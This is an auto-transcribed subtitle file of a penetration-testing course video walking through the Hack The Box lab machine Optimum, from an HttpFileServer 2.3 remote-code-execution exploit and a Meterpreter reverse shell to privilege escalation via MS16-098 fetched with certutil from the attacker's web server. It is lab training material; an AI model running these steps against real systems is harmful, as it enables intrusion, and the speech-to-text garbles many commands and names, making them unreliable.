1
00:00:00,120 --> 00:00:02,760
Welcome to walk through seven.

2
00:00:02,760 --> 00:00:07,830
We're going to be covering a box called Optimum Optimum lives at 10:00 at ten.

3
00:00:07,860 --> 00:00:08,550
Ten.

4
00:00:08,640 --> 00:00:09,410
Eight.

5
00:00:09,480 --> 00:00:11,220
So same as the last video.

6
00:00:11,220 --> 00:00:15,250
Go ahead and start that box up start and map scan now.

7
00:00:15,270 --> 00:00:19,560
Get everything ready to roll and then catch me in the next video.

8
00:00:19,560 --> 00:00:24,360
If you're not doing the walkthrough as if you're just watching along go ahead and just keep the film

9
00:00:24,360 --> 00:00:25,280
rolling.

10
00:00:25,350 --> 00:00:27,670
Let's go ahead and get started.

11
00:00:27,680 --> 00:00:28,150
All right.

12
00:00:28,180 --> 00:00:37,040
So our skin is back and we are lucky again in two videos I do believe where we only have one port open.

13
00:00:37,040 --> 00:00:44,750
So again we have port 80 open here which means that our attack vector outside of something like Port

14
00:00:44,750 --> 00:00:47,910
knocking is going to be through port 80.

15
00:00:48,080 --> 00:00:54,560
So because it's through port 80 we are very direct in what we can do with our attacks.

16
00:00:54,590 --> 00:01:04,250
So right off the bat we can see here that we have this H TGP file server HP D two point three also known

17
00:01:04,280 --> 00:01:07,400
as a Jeff s two point three.

18
00:01:07,400 --> 00:01:07,740
OK.

19
00:01:07,750 --> 00:01:14,300
So we can take this information and go to Google say hey is there a Jeff s two point three is there

20
00:01:14,300 --> 00:01:20,690
some sort of exploit for it we can use search buoy and search for it but before we do any of that I

21
00:01:20,690 --> 00:01:28,350
do want to go out to the Web page and just make sure we know what we're working with here so we come

22
00:01:28,350 --> 00:01:31,260
to this web page and there's no files in this folder.

23
00:01:31,260 --> 00:01:33,110
We understand that it's a file server.

24
00:01:33,120 --> 00:01:38,680
So we should have the ability to upload files download files but there's nothing here.

25
00:01:39,050 --> 00:01:42,590
And at the moment we aren't logged in as anybody either.

26
00:01:42,720 --> 00:01:49,500
So we could go to the log in and attempt to log in and see if there are any user name credentials that

27
00:01:49,500 --> 00:01:51,420
we can access with.

28
00:01:51,420 --> 00:01:56,880
We could go to Google here and say hey is this HMS file server.

29
00:01:56,880 --> 00:01:59,750
Does it have a default credentials.

30
00:01:59,790 --> 00:02:01,050
And we can look that up.

31
00:02:01,050 --> 00:02:04,410
Now each of us by default does not have default credentials.

32
00:02:04,410 --> 00:02:07,500
Those are actually set up when you setup HMS HMs.

33
00:02:07,530 --> 00:02:10,970
So in terms of security that's a good thing.

34
00:02:11,040 --> 00:02:18,390
But you're going to find here that there is not so good stuff going on as well if we actually look at

35
00:02:18,500 --> 00:02:25,380
these this link here the HP file server two point three you could see at the bottom that red Jetta dot

36
00:02:25,380 --> 00:02:26,760
com pops up.

37
00:02:26,940 --> 00:02:34,620
So Regina is the vendor This is who makes this file server two point three come down here and just go

38
00:02:34,620 --> 00:02:42,060
to search flight and just say search boy reject oh and see what's there and you could see immediately

39
00:02:42,060 --> 00:02:46,820
that well there is a medical module right.

40
00:02:46,920 --> 00:02:51,760
There is some Python for two point X but two point three is showing up repeatedly.

41
00:02:52,180 --> 00:03:00,790
So if we were to go out to the inter webs and do something like Brigitte go fast so that two point three

42
00:03:00,790 --> 00:03:04,670
X flight just Google knows Google knows what we're after.

43
00:03:04,690 --> 00:03:07,550
So there is a exploit dash DV.

44
00:03:07,570 --> 00:03:08,780
We can check that out.

45
00:03:09,100 --> 00:03:14,680
There's a rapid seven hour favorite because we can just use the pre-existing metabolite module if we

46
00:03:14,680 --> 00:03:15,710
want to.

47
00:03:16,210 --> 00:03:23,790
And we come through here you can see that Magento file server is vulnerable to remote command execution

48
00:03:23,800 --> 00:03:24,700
fantastic.

49
00:03:24,700 --> 00:03:25,500
This is what we want.

50
00:03:25,510 --> 00:03:26,350
Right.

51
00:03:26,350 --> 00:03:30,780
On Windows XP Windows 7 and Windows 8 is where it's been tested.

52
00:03:30,790 --> 00:03:36,110
Doesn't mean it's not other operating systems as well.

53
00:03:36,340 --> 00:03:43,090
When you come through here and we've got this we've got this as well we can download this python file

54
00:03:43,120 --> 00:03:46,050
and attempt to execute manually.

55
00:03:46,060 --> 00:03:50,800
But in this instance we're just gonna take what we know and we're going to take medicinally and try

56
00:03:50,800 --> 00:03:52,300
to get a shell.

57
00:03:52,330 --> 00:03:55,830
So this looks like a winner for us especially with remote code execution.

58
00:03:56,260 --> 00:03:59,440
So let's go into here and we'll just go and boot up Metis FOIs

59
00:04:02,660 --> 00:04:05,920
and we're going to attack this machine.

60
00:04:05,960 --> 00:04:07,540
We don't know a lot about it.

61
00:04:07,540 --> 00:04:09,080
Let's go back to the scan and see.

62
00:04:09,080 --> 00:04:19,610
So the best guess here the best OS guess is that it's a Windows Server 2012 2012 R2 and you're seeing

63
00:04:19,610 --> 00:04:21,020
that come through quite a bit.

64
00:04:21,020 --> 00:04:27,020
So it's pulling down information that it really believes it's 2012 and even believes Windows 7 or Windows

65
00:04:27,020 --> 00:04:35,390
8 so because of this I think there's probably a high likelihood that this machine is going to be a 64

66
00:04:35,390 --> 00:04:37,320
bit as opposed to a 32 bit.

67
00:04:37,760 --> 00:04:44,120
So we could try a 64 bit payload first if it doesn't work then we'll go with a 32 bit payload and just

68
00:04:44,120 --> 00:04:45,360
be safe.

69
00:04:45,440 --> 00:04:54,440
So let's go ahead and just search for a general quick and then we'll say use exploit windows HP show

70
00:04:55,020 --> 00:04:56,880
a jet pass.

71
00:04:56,890 --> 00:04:57,680
Exactly.

72
00:04:57,860 --> 00:04:58,290
OK.

73
00:04:58,310 --> 00:05:00,260
Options.

74
00:05:00,400 --> 00:05:04,000
We're going to go ahead and set our our host

75
00:05:06,630 --> 00:05:09,560
to ten point ten point ten point eight.

76
00:05:09,960 --> 00:05:15,330
The rest of it looks OK at this point and then the exploit target is automatic.

77
00:05:15,360 --> 00:05:18,890
Let's go ahead and just show targets and see what they're picking.

78
00:05:18,900 --> 00:05:20,460
So all they have is automatic.

79
00:05:20,460 --> 00:05:35,100
All right let's go ahead and set the payload to Windows X 64 interpreter reverse underscore TCB options

80
00:05:35,990 --> 00:05:36,360
OK.

81
00:05:36,390 --> 00:05:39,990
Set our El host and we'll set at the tunnel 0.

82
00:05:39,990 --> 00:05:43,170
Now this is a trick actually sent in by a user.

83
00:05:43,170 --> 00:05:45,680
So if you are watching this and you're the one to tell me about this.

84
00:05:45,680 --> 00:05:46,050
Thank you.

85
00:05:46,050 --> 00:05:47,940
This is actually a really cool trick.

86
00:05:47,940 --> 00:05:54,870
You can just set your interface which if I ever read I would notice that instead of typing in your address

87
00:05:54,870 --> 00:05:57,990
or having to go back and look for the I.P. address that you're working with.

88
00:05:58,740 --> 00:06:07,120
So interface here port and then we can just go ahead and run this bad boy and see what happens and boom

89
00:06:07,180 --> 00:06:09,740
right away we'll get a return fritter session.

90
00:06:09,760 --> 00:06:11,390
So that's awesome.

91
00:06:11,410 --> 00:06:12,430
Go ahead hit enter.

92
00:06:12,430 --> 00:06:15,760
It's going to take a second I think with this cleanup trying to go on.

93
00:06:15,810 --> 00:06:25,410
OK so we can say this info and we are 64 bit mature printer on 64 bit architecture.

94
00:06:25,410 --> 00:06:28,020
That is where we want to be.

95
00:06:28,020 --> 00:06:31,360
So now let's go ahead and look at the get you I.D..

96
00:06:31,890 --> 00:06:33,630
Well they get you I.D. is cost.

97
00:06:33,640 --> 00:06:35,280
So we're going to have to do some privacy.

98
00:06:35,910 --> 00:06:40,470
So a couple of ways to give privacy which I say get system that didn't work.

99
00:06:40,680 --> 00:06:51,600
We can background and we can say we could say search for suggest or gain and we can just use post multiply

100
00:06:51,630 --> 00:06:54,820
recon political exploits suggest gesture.

101
00:06:54,900 --> 00:07:01,280
Now if I'm going through this fast it's because I've expected you to know this by now.

102
00:07:01,290 --> 00:07:01,620
Right.

103
00:07:01,620 --> 00:07:04,980
All these things we're seeing so far I've shown you.

104
00:07:05,070 --> 00:07:14,760
Let's go ahead Andrew you say options on this one I had set a session set session to 1 and then we're

105
00:07:14,760 --> 00:07:17,310
going to run this but then we're gonna automatically cancel it.

106
00:07:18,420 --> 00:07:22,100
So let's control see actually actually no let's run it.

107
00:07:22,100 --> 00:07:25,670
Sorry I was thinking ahead but that's fine.

108
00:07:25,770 --> 00:07:29,850
So we're going to run this and let's see if it collects anything.

109
00:07:29,850 --> 00:07:39,810
Now it should be noted that on 64 bit machines it's not it's not easy to gather local exploits from

110
00:07:39,810 --> 00:07:43,410
the experts suggests or it's better for a 32 bit machines.

111
00:07:43,440 --> 00:07:49,450
So you're going to see here that it's going to try some of these and none of them are coming through.

112
00:07:49,690 --> 00:07:50,020
OK.

113
00:07:50,020 --> 00:07:52,010
That's not a big deal.

114
00:07:52,180 --> 00:07:58,780
So we're gonna have to do manual post exploitation and this is something we haven't covered.

115
00:07:59,290 --> 00:08:05,470
But I have thrown out in the past that there are scripts out there on both the Windows side and the

116
00:08:05,470 --> 00:08:06,070
Linux side.

117
00:08:06,070 --> 00:08:07,440
We covered Linux.

118
00:08:07,510 --> 00:08:09,500
We talked about the scripts that are out there.

119
00:08:10,150 --> 00:08:16,390
So if you this is where you should have gotten this far with everything we've learned right and you

120
00:08:16,390 --> 00:08:23,890
have the tools and the mindset by now to know hey OK how do I how do I get better how do I escalate

121
00:08:23,890 --> 00:08:25,080
these privileges.

122
00:08:25,390 --> 00:08:34,300
And we can say OK well we're gonna have to go to Google go to Google we can say OK Google windows privilege

123
00:08:34,570 --> 00:08:35,810
escalation.

124
00:08:35,860 --> 00:08:41,860
Now there is a great great guide out there by fuzzy security it is considered pretty much the Bible

125
00:08:42,340 --> 00:08:43,660
when it comes to privacy.

126
00:08:43,690 --> 00:08:48,640
Now we can go through we can check all of this information that comes through here.

127
00:08:48,670 --> 00:08:54,700
Lucky for us some people have scripted some of this but there are still very manual methods to doing

128
00:08:54,700 --> 00:09:01,560
this especially when we're talking you know just gathering some some of this information.

129
00:09:01,570 --> 00:09:06,970
It can be automated gathering system info and looking for different items based on that or based on

130
00:09:06,970 --> 00:09:12,670
packages of some of this is just really you're going to have to look through it and see what kind of

131
00:09:12,670 --> 00:09:17,320
information comes back and if anything stands out or maybe there's programs that are running that you

132
00:09:17,320 --> 00:09:18,340
can escalate with.

133
00:09:19,090 --> 00:09:25,210
So we haven't dough too deep into this yet and that's OK privilege escalation this kind of stuff isn't

134
00:09:25,240 --> 00:09:26,940
hyper realistic.

135
00:09:27,050 --> 00:09:32,290
There's some realism when you're doing 10 test the majority of the time your privacy isn't going to

136
00:09:32,290 --> 00:09:37,640
fall from any of this kind of things I doesn't mean it can't happen it just means it's not likely privacy

137
00:09:37,650 --> 00:09:43,520
is is usually on the active directory side and it's not related to most of this stuff.

138
00:09:43,600 --> 00:09:50,590
This is better for capture the flag type things you know doing the hack the box machines or any other

139
00:09:50,590 --> 00:09:58,660
type of lab environment like this where they demonstrate the ability to use exploits and privilege escalation.

140
00:09:58,660 --> 00:10:06,730
Now there is a tool that I want to point out that I think is really good and it's been updated recently

141
00:10:06,880 --> 00:10:08,500
but we're still going to use the older version.

142
00:10:08,500 --> 00:10:12,820
We could say Sherlock and this is written by a Rasta mouse.

143
00:10:12,820 --> 00:10:21,160
So if you type in Sherlock Rasta mouse you can see it's a power shell script here so he can go ahead

144
00:10:21,190 --> 00:10:28,810
and just clone or download this whole thing and we could see also that it quickly looks for the following

145
00:10:28,810 --> 00:10:36,920
items and so all of these different privilege escalation of vulnerabilities on Windows.

146
00:10:36,930 --> 00:10:43,980
The other thing that we could do too is we could go into our session again and we can just say ciao.

147
00:10:43,980 --> 00:10:45,240
Are we going to say this info.

148
00:10:45,240 --> 00:10:45,630
Right.

149
00:10:46,200 --> 00:10:47,550
And we could see that we're on build.

150
00:10:47,560 --> 00:10:56,190
Ninety six hundred we could say Windows 2012 are to do a copy on that and we could go to Google and

151
00:10:56,190 --> 00:11:02,140
just say hey is there privilege escalation for this.

152
00:11:02,280 --> 00:11:10,580
And the first one here is this MF 16 0 32 that shows up now.

153
00:11:11,150 --> 00:11:11,720
OK.

154
00:11:11,720 --> 00:11:13,500
And MF 16 0 32.

155
00:11:13,520 --> 00:11:20,900
And this is for Windows 7 they're 10 two thousand eight through 2002 32 and 64 bit.

156
00:11:21,590 --> 00:11:27,560
So it needs a race condition to see there must be two plus CPR cause if testing in a VM just make sure

157
00:11:27,560 --> 00:11:28,530
they add a core.

158
00:11:28,790 --> 00:11:29,630
OK.

159
00:11:29,780 --> 00:11:38,140
So there is a there is a power supply exploit or power shall I think it might be part of the powers

160
00:11:38,180 --> 00:11:39,490
play package by measure.

161
00:11:39,500 --> 00:11:43,610
Definitely power shall high exploit that's available for us.

162
00:11:43,610 --> 00:11:52,520
There is also we can search this as well we can background and just say search M.S. 16 0 32 something

163
00:11:52,520 --> 00:11:53,780
like this.

164
00:11:53,780 --> 00:11:56,230
And this does exist here.

165
00:11:56,330 --> 00:11:57,950
So let's go ahead and copy this

166
00:12:00,990 --> 00:12:07,020
and we'll just say use and paste.

167
00:12:07,160 --> 00:12:08,260
So again the.

168
00:12:09,140 --> 00:12:11,300
The OS information is important to build.

169
00:12:11,300 --> 00:12:14,020
Information is important the same thing with Linux.

170
00:12:14,030 --> 00:12:18,680
The one of the first things you're gonna be looking for outside of like looking at the history or looking

171
00:12:18,680 --> 00:12:25,130
at sudo privileges you're going to want to look at on a Linux machine the type of OS that's running

172
00:12:25,130 --> 00:12:31,730
the bill that's running and see if there are any exploits or privacy exploits specifically for that

173
00:12:32,010 --> 00:12:34,880
that OS and the architecture.

174
00:12:34,880 --> 00:12:39,020
So this is one of the kind of the basic one on ones of what to look for.

175
00:12:39,110 --> 00:12:44,120
And even if you look back at this fuzzy security guide you could see that they're doing information

176
00:12:44,120 --> 00:12:49,730
gathering the very first step that they do is they gather the OS name and the OS version.

177
00:12:49,730 --> 00:12:52,120
So super important information here.

178
00:12:52,130 --> 00:12:59,720
Now let's go ahead and type options and let's set the session here to one and then you see the target

179
00:12:59,720 --> 00:13:07,490
down there is X 86 we know we are on x 60 for us let's show targets and we'll set target to 1.

180
00:13:08,630 --> 00:13:08,960
OK.

181
00:13:08,960 --> 00:13:14,750
Now I'm going to run this and then I'm going to kill it see if I can kill it.

182
00:13:15,610 --> 00:13:15,910
OK.

183
00:13:15,910 --> 00:13:17,830
Options.

184
00:13:17,920 --> 00:13:20,710
So again it pulls the El host.

185
00:13:20,710 --> 00:13:25,590
I actually tried this with setting my interface first and it's still messed up.

186
00:13:25,600 --> 00:13:29,040
So we just have to kill it here.

187
00:13:29,170 --> 00:13:29,770
Come back.

188
00:13:29,760 --> 00:13:32,460
Set the El host to our channel zero.

189
00:13:32,480 --> 00:13:34,900
Let's go ahead and pick a new Al port.

190
00:13:34,900 --> 00:13:41,070
Let's put the El torture like we'll do four for three here and we'll try running this.

191
00:13:41,140 --> 00:13:43,030
Now this exploit is iffy.

192
00:13:43,120 --> 00:13:46,860
It works sometimes and it works sometimes not.

193
00:13:46,870 --> 00:13:48,660
So we'll see if we can get this to work.

194
00:13:48,670 --> 00:13:54,100
If not we'll go back and we'll do the manual more manual method of getting it to work.

195
00:13:54,640 --> 00:13:56,440
So I've gotten this to pull.

196
00:13:56,470 --> 00:14:01,830
Once or twice but in the end it doesn't really like executing this script.

197
00:14:01,840 --> 00:14:03,440
So we'll see how this works.

198
00:14:03,490 --> 00:14:03,730
OK.

199
00:14:03,750 --> 00:14:05,380
So we ran it twice here.

200
00:14:05,380 --> 00:14:06,430
And for me it didn't work.

201
00:14:06,430 --> 00:14:08,830
Maybe you got lucky and it works for you.

202
00:14:08,860 --> 00:14:14,900
But let's go ahead and take a look at the more manual method that we can use and we'll go from there.

203
00:14:14,920 --> 00:14:15,210
OK.

204
00:14:15,220 --> 00:14:21,430
So I'm going to show you two different tools that we can use to do privilege escalation enumeration.

205
00:14:21,520 --> 00:14:25,790
The first one that we covered already is this Rossum mouse Sherlock.

206
00:14:26,350 --> 00:14:28,270
So let's go ahead and just click on this.

207
00:14:28,270 --> 00:14:35,440
Sure locked up P.S. 1 and then what I'll do is we'll just take the raw version control a control see.

208
00:14:35,450 --> 00:14:43,500
This will be the easiest way we'll come into our terminal here and then I'm going to open up a new tab

209
00:14:44,920 --> 00:14:51,580
and then we will just say gee edit and we'll just call this you call it whatever you want to call it.

210
00:14:51,580 --> 00:14:52,030
Sure.

211
00:14:52,180 --> 00:14:55,890
P.S. One is for easy naming reference.

212
00:14:55,930 --> 00:14:58,630
Go ahead and control the here.

213
00:14:58,630 --> 00:15:03,180
Paste this in and save it ok.

214
00:15:03,210 --> 00:15:12,240
Now on our end over here what we're gonna do is we are going to come back to our machine or go into

215
00:15:12,240 --> 00:15:19,410
our sessions and then type in shall OK we're on our desktop.

216
00:15:19,440 --> 00:15:20,380
That's fine.

217
00:15:20,400 --> 00:15:25,380
Let's go ahead and grab that file so let's load up the file here.

218
00:15:25,380 --> 00:15:37,680
We're going to do our Python simple HDP server with the dash cam of course and then try it and port

219
00:15:37,710 --> 00:15:41,940
80 let that run and then we're gonna use cert.

220
00:15:41,960 --> 00:15:45,010
You tell all this should be refresh your information right.

221
00:15:45,000 --> 00:15:54,000
Sir you still to do your all cash and then a file of HBP and then are IP which I honestly don't know

222
00:15:54,000 --> 00:15:54,730
the IP address.

223
00:15:54,750 --> 00:15:56,850
I think it's dot eight.

224
00:15:56,950 --> 00:16:04,130
Well do I have config I have stopped 14 actually 14 for Slash for it up.

225
00:16:04,130 --> 00:16:06,260
Yes one will call this shirt.

226
00:16:06,290 --> 00:16:09,890
Yes one OK.

227
00:16:09,980 --> 00:16:16,310
If we say dir we should see that OK sure locked up.

228
00:16:16,330 --> 00:16:21,000
Yes one is here so here's what we're gonna do.

229
00:16:21,000 --> 00:16:28,920
We are going to execute this file and we're just gonna say something along the lines of power shall

230
00:16:28,970 --> 00:16:29,630
die.

231
00:16:29,650 --> 00:16:37,050
He will say execution bypass all we're doing is bypassing the execution policy.

232
00:16:37,080 --> 00:16:41,430
This is something if you're not familiar with power shell that's just there to prevent us from running

233
00:16:42,690 --> 00:16:47,730
files that perhaps could be malicious it's not really anything other than a protection that we just

234
00:16:47,730 --> 00:16:48,670
turn off.

235
00:16:49,110 --> 00:16:54,090
So we're going to turn that off here and then we're going to run a command in the command that we're

236
00:16:54,090 --> 00:17:06,390
gonna run is something along the lines like this we are going to say import module and then we're going

237
00:17:06,390 --> 00:17:16,490
to import good old shirt up P.S. One here and then we're gonna run the command find all volumes which

238
00:17:16,490 --> 00:17:27,070
is part of the Sherlock template do this execute and there we go.

239
00:17:28,240 --> 00:17:30,170
So come through here.

240
00:17:30,190 --> 00:17:31,630
Sherlock executes.

241
00:17:31,630 --> 00:17:34,750
And you can see that it's starting to search for vulnerabilities.

242
00:17:34,990 --> 00:17:38,740
You see not vulnerable blah blah blah all the way down.

243
00:17:38,740 --> 00:17:40,390
Scroll through.

244
00:17:40,540 --> 00:17:40,840
OK.

245
00:17:40,840 --> 00:17:45,280
And the 16 0 thirty two shows up again and appears vulnerable.

246
00:17:45,290 --> 00:17:48,510
Zero thirty four one thirty five.

247
00:17:49,150 --> 00:17:52,180
And it has NSA tonight as well and vulnerable.

248
00:17:52,330 --> 00:17:52,690
OK.

249
00:17:52,750 --> 00:17:59,610
So there's these three here as potential possibilities we've already identified and the 16 0 3 2 and

250
00:17:59,610 --> 00:18:00,470
try with Mets play.

251
00:18:00,480 --> 00:18:01,380
It did not work.

252
00:18:01,380 --> 00:18:04,430
This machine is vulnerable to M.S. 16 0 32.

253
00:18:04,440 --> 00:18:07,250
However it is a little beyond our scope.

254
00:18:07,260 --> 00:18:10,440
It gets a little advance and how we need to exploit it.

255
00:18:10,680 --> 00:18:15,950
And I think that it's possibly even a later episode that we can kind of start getting into that stuff.

256
00:18:15,990 --> 00:18:21,170
It's very powerful heavy and involves a little bit of modification and downloading.

257
00:18:21,230 --> 00:18:22,920
So I'm going to avoid that method.

258
00:18:22,950 --> 00:18:26,690
But lucky for us there are a couple other methods that we can use.

259
00:18:26,970 --> 00:18:29,940
Now this was just one item here right.

260
00:18:29,970 --> 00:18:31,280
So we're using this.

261
00:18:31,290 --> 00:18:35,760
We found three potential vulnerabilities that might work.

262
00:18:35,760 --> 00:18:38,860
Let's look at another thing that we can do as well.

263
00:18:38,880 --> 00:18:44,760
Now there is a great tool out there if we go to the Googles and go to Google dot com and we just say

264
00:18:45,530 --> 00:18:53,290
we are going to search for Windows exploit suggest our in this GDI security right here.

265
00:18:53,310 --> 00:19:01,460
Let's go ahead and just copy this and we're just going to clone this whole thing here copy this.

266
00:19:01,570 --> 00:19:11,360
Come over here and we're going to do a get clone on this item and we'll see these into the windows exploit

267
00:19:11,420 --> 00:19:14,590
suggest or allies.

268
00:19:14,690 --> 00:19:15,080
OK.

269
00:19:15,110 --> 00:19:21,020
So if you look at the file description down here you can see that we need to run this update.

270
00:19:21,290 --> 00:19:23,020
So we'll go ahead and update it.

271
00:19:24,290 --> 00:19:29,330
So we'll say Python windows X to gesture update like this.

272
00:19:29,910 --> 00:19:30,290
OK.

273
00:19:30,290 --> 00:19:33,050
Now you see that I wrote an Excel file out for us.

274
00:19:33,140 --> 00:19:36,120
So now we're going to actually use that excel file.

275
00:19:36,200 --> 00:19:38,130
Actually let's do one thing first.

276
00:19:38,150 --> 00:19:44,620
So in order to run this we need the excel file that it just provided the database and the system info.

277
00:19:44,870 --> 00:19:48,410
So we got to go ahead and type in system info on our shell.

278
00:19:48,990 --> 00:19:51,950
So we go back to our show and we type in system info

279
00:19:55,100 --> 00:20:01,320
we need to copy all of this information that just came out right here.

280
00:20:01,350 --> 00:20:01,960
Copy.

281
00:20:02,400 --> 00:20:10,500
And then we can just put this into a text file call it get it sis info that text paste that and save

282
00:20:10,500 --> 00:20:13,260
it ok.

283
00:20:13,300 --> 00:20:21,550
So looking at the syntax we need to run Python database something like this will copy it so to say Python

284
00:20:22,810 --> 00:20:32,630
paste this our database is this two thousand nineteen right there should auto tab complete.

285
00:20:32,640 --> 00:20:41,220
Next thing we need is we need our system info text file so dash dash system info and then says in vote

286
00:20:41,220 --> 00:20:48,420
at text run that now it's going to determine if there's any types of vulnerabilities based on this let's

287
00:20:48,420 --> 00:20:55,500
make this a little bit bigger and if we look through this we can see anything that lights up like a

288
00:20:55,500 --> 00:21:00,270
Christmas tree in green is potentially vulnerable right.

289
00:21:00,280 --> 00:21:01,480
So it's searching through.

290
00:21:02,320 --> 00:21:09,930
And it's looking through all of these right and let's see if we scroll down the bottom.

291
00:21:10,640 --> 00:21:11,080
OK.

292
00:21:11,080 --> 00:21:19,660
It does pick up again and picks up 0 32 here another potential exploit is right here.

293
00:21:19,660 --> 00:21:23,850
This M.S. 16 is zero ninety eight second one down the list for us.

294
00:21:23,860 --> 00:21:26,960
Thankfully we wouldn't have gone too far.

295
00:21:27,040 --> 00:21:36,040
Now the nice thing too is it provides us a exploit DV link so we can actually just open the link go

296
00:21:36,040 --> 00:21:39,880
right to it and download this exploit here

297
00:21:43,320 --> 00:21:48,340
so it's going to save into our downloads in a see format.

298
00:21:48,750 --> 00:21:58,620
So let's go ahead and open up a new tab here and I'm going to C.D. back into downloads and then we have

299
00:21:58,740 --> 00:22:00,990
to GCSE this.

300
00:22:00,990 --> 00:22:08,580
So we're going to JCC for 1 0 2 0 dashed that see here.

301
00:22:08,580 --> 00:22:16,480
We'll just do an output of E X that EMC we've got a fatal error OK.

302
00:22:16,480 --> 00:22:18,430
Let's take a look at that fatal error.

303
00:22:18,430 --> 00:22:20,980
We don't have a Windows dot h file.

304
00:22:20,980 --> 00:22:30,060
Let's see if I O We need a Windows that H OK we can actually also download the binary right here it

305
00:22:30,060 --> 00:22:35,630
looks like let's just copy this and we might actually even have it on our on our computer as well.

306
00:22:35,640 --> 00:22:41,570
So windows that h we could download that and put that into our compiler.

307
00:22:41,600 --> 00:22:50,790
But let's see if we can just do a locate on for 1 0 2 0 and see if there's EMC already built in.

308
00:22:50,790 --> 00:22:51,510
There is not.

309
00:22:51,540 --> 00:22:54,610
But we can go ahead and just download it.

310
00:22:54,750 --> 00:22:56,730
We can search for it as well.

311
00:22:56,730 --> 00:23:00,680
Just to make really quick sure that we don't have it.

312
00:23:00,870 --> 00:23:07,360
It is M.S. 16 not twelve sixteen zero ninety eight

313
00:23:11,860 --> 00:23:16,060
and we've got the c file already download it here which you could have grabbed and then the text.

314
00:23:16,120 --> 00:23:16,360
OK.

315
00:23:16,420 --> 00:23:23,030
Let's go ahead and just paste here and download this and we'll save this OK.

316
00:23:23,050 --> 00:23:33,780
And from here we're going to kill out this and go ahead and open up are Python web server in this folder.

317
00:23:33,780 --> 00:23:36,480
Because we just downloaded it to the HTC folder

318
00:23:41,530 --> 00:23:47,730
sorry I am backward simple HDP server or 80 OK.

319
00:23:47,740 --> 00:23:53,350
So now we're hosting up that file let's go ahead and put it on to this machine.

320
00:23:53,620 --> 00:23:55,780
So we're still on a shell here.

321
00:23:55,780 --> 00:24:04,990
We're going to do cert you tail again or do your alt cache again file transfer and we said we are at

322
00:24:04,990 --> 00:24:07,060
14 that 14 for me.

323
00:24:07,600 --> 00:24:19,220
And then this one was called for 1 0 2 0 that XY and we'll call it s h dot c OK.

324
00:24:19,460 --> 00:24:20,900
Unless you can see.

325
00:24:20,910 --> 00:24:23,710
Sorry sir I'm losing my mind today guys.

326
00:24:24,240 --> 00:24:24,640
OK.

327
00:24:24,660 --> 00:24:32,490
We try to run s h dot EMC and let's see what happens OK.

328
00:24:32,490 --> 00:24:33,500
And it's not working.

329
00:24:33,510 --> 00:24:34,770
Why is it not working.

330
00:24:34,770 --> 00:24:39,540
Because if you look up in the upper right hand corner and you look at this actually you see 0 bytes

331
00:24:39,540 --> 00:24:44,460
actually transferred over because we never really transferred over the file we just transferred over

332
00:24:44,460 --> 00:24:45,630
it placeholder.

333
00:24:45,780 --> 00:24:48,000
Firefox is determined this was malware.

334
00:24:48,030 --> 00:24:50,990
Let's go ahead and just hit open come back.

335
00:24:51,000 --> 00:24:56,040
We're actually gonna have to kill this shell here and then we're gonna go ahead and say Shell one more

336
00:24:56,040 --> 00:25:04,560
time we'll do our CERT you till again your oil cache file and this may have actually worked for you

337
00:25:04,560 --> 00:25:10,860
if you didn't get caught by the Microsoft or the sorry the Firefox here.

338
00:25:10,860 --> 00:25:20,400
You can do 10 10 to 14 but 14 forward slash and this is for 1 0 2 0 that you see.

339
00:25:21,000 --> 00:25:22,460
Give it a safe shot.

340
00:25:22,470 --> 00:25:32,610
You see what is right that file if we can do a DA now and you see we actually have executable DSA QA

341
00:25:32,640 --> 00:25:33,360
EMC

342
00:25:36,170 --> 00:25:38,290
and who am I.

343
00:25:38,300 --> 00:25:41,470
We are authority system so we have routed this machine.

344
00:25:42,710 --> 00:25:48,610
OK that was a bit of a cluster [REMOVED] and you could see me struggle at times as well.

345
00:25:48,620 --> 00:25:49,670
This one was not.

346
00:25:50,270 --> 00:25:56,600
Now this one is fully capable of being routed from everything we learned in the past though it is not

347
00:25:56,660 --> 00:26:01,330
completely easy to do so right up until this point.

348
00:26:01,350 --> 00:26:08,980
I've given you the tools necessary to be successful and I'm guessing most of you probably got the at

349
00:26:09,020 --> 00:26:11,620
least the path into a user.

350
00:26:11,630 --> 00:26:17,690
Now we have relied on some things like the local exploits to gesture for windows and we have done some

351
00:26:17,690 --> 00:26:24,990
privacy with Linux but we never really touched on the methodology needed for the Windows side of things.

352
00:26:25,010 --> 00:26:31,430
That is a little bit of the work harder aspect of pen testing is to kind of try to figure this out on

353
00:26:31,430 --> 00:26:39,380
your own and hopefully some of you got the idea to go and look for some of these exploits now again

354
00:26:39,710 --> 00:26:41,750
it's probably time consuming right.

355
00:26:41,750 --> 00:26:52,010
If you come through and you see the list of just different types of exploits that are possible and again

356
00:26:52,640 --> 00:26:55,180
there are more than one ways to skin a cat here.

357
00:26:55,190 --> 00:27:01,700
The 0 3 2 would work and there are some power shell modules that we could use against it now.

358
00:27:01,790 --> 00:27:03,950
Again it's a little more complicated.

359
00:27:03,950 --> 00:27:09,410
I do welcome you to try it and see if you can get it to work but that's something that we will work

360
00:27:09,410 --> 00:27:11,280
on in the future.

361
00:27:11,630 --> 00:27:18,620
But in this video we did manage to do privilege escalation with the windows machine and use a couple

362
00:27:18,620 --> 00:27:20,540
of new tools to do so right.

363
00:27:20,540 --> 00:27:26,060
We learned about the fuzzy security and this is a great guide that anybody should keep in their back

364
00:27:26,060 --> 00:27:30,240
pocket especially if you're doing hack the Vox style machines.

365
00:27:30,290 --> 00:27:37,660
We learned about Rasta Rasta mouse and the Sherlock which has actually been deprecated.

366
00:27:37,700 --> 00:27:44,870
I'm not sure what they've moved on to but it's called what's Watson now everybody's new thing is to

367
00:27:45,200 --> 00:27:52,460
write in C or C sharp and then make these SL and files and you have to compile them yourself into X

368
00:27:52,460 --> 00:27:57,620
cables and this is actually in net so everybody's moving away.

369
00:27:57,620 --> 00:28:00,770
It seems like from power shell now and into these.

370
00:28:00,770 --> 00:28:02,690
This is the new the new hype.

371
00:28:02,690 --> 00:28:03,850
So.

372
00:28:04,130 --> 00:28:07,510
But we're not going to use Watson today.

373
00:28:07,680 --> 00:28:09,960
The Sherlock was was plenty good.

374
00:28:09,980 --> 00:28:15,300
And also this Windows XP suggestion was actually pretty good as well.

375
00:28:15,350 --> 00:28:18,320
So a couple of new tools that we learned along the way.

376
00:28:19,100 --> 00:28:24,980
So until next time I really do hope you learn something out of this video and I hope to see you in the

377
00:28:24,980 --> 00:28:26,480
next episode.

378
00:28:26,480 --> 00:28:28,940
Thank you very much and I will see you in the next video.